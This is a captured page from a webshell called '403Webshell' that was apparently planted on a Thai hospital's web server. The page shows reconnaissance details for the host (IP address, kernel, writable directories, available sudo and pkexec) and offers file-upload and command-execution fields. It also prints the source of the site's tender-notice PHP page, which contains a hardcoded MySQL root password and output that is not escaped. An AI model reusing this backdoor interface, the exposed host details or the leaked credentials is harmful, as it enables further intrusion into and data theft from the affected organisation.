403Webshell
Server IP : 182.53.201.61  /  Your IP : 216.73.217.175
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/upload/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/upload/upload301.php
<html>
<head>
<title>อัพโหลดข่าวประกวดราคา สอบราคา</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style type="text/css">
<!--
.style2 {
	color: #DD8373;
	font-weight: bold;
}
.style5 {color: #006666}
.style6 {color: #3399FF}
.style7 {font-size: 18px}
.style10 {color: #00CC00}
-->
</style>
</head>
<body>
<p align="center">&nbsp;</p>
<p align="center"><span class="style2">เอกสารประกาศประกวดราคา สอบราคา โรงพยาบาลสัตหีบ กม.10</span><br>
  <?
  
	$objConnect = mysql_connect("localhost","root","090407") or die("Error Connect to Database");
	$objDB = mysql_select_db("upload");
	mysql_query("SET NAMES UTF8");
	$strSQL = "SELECT * FROM files where instr(filesname,'.pdf') And DateReport <> '000-00-00' order by DateReport desc ";
	$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
?>
</p>
<table width="695" height="106" border="0" align="center">
<tr>
  <th height="25" colspan="3" bgcolor="#D2FFFF"><div align="left" class="style7">
    <div align="right"><a href="../index.php" class="style6" style="text-decoration: none;">&nbsp;&nbsp;หน้าแรก &nbsp;&nbsp;</a><span class="style10">||</span>&nbsp;&nbsp;
	</span></div>
  </div></th>
  </tr>
<tr>
<th width="54" height="51" bgcolor="#D2FFFF"><div align="center" class="style5">ลำดับ</div></th>
<th width="525" bordercolor="#FF3333" bgcolor="#D2FFFF"><div align="center" class="style5">ชื่อเรืองประกาศข่าวประกวดราคา สอบราคา</div></th>
<th width="94" bgcolor="#D2FFFF"><div align="center" class="style5">วันที่ลงประกาศ</div></th>
</tr>
<?
	while($objResult = mysql_fetch_array($objQuery))
	{
?>
<tr>
  <td height="22">&nbsp;</td>
  <td bordercolor="#FF3333"><div align="left"><a href="myfile/<?=$objResult["FilesName"];?>">
  <?=$objResult["FilesName"];?><br><br>
</a></div></td>
<td><div align="center">
    <?
	$y=substr($objResult["DateReport"],0,4)+543;
	$m=substr($objResult["DateReport"],4,4);
	$d=substr($objResult["DateReport"],8,2);
	$dateprt = $d.$m.$y;
	echo $dateprt; 
	?>
</div></td>
</tr>
<?
	}
?>
</table>
<?
mysql_close($objConnect);
?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit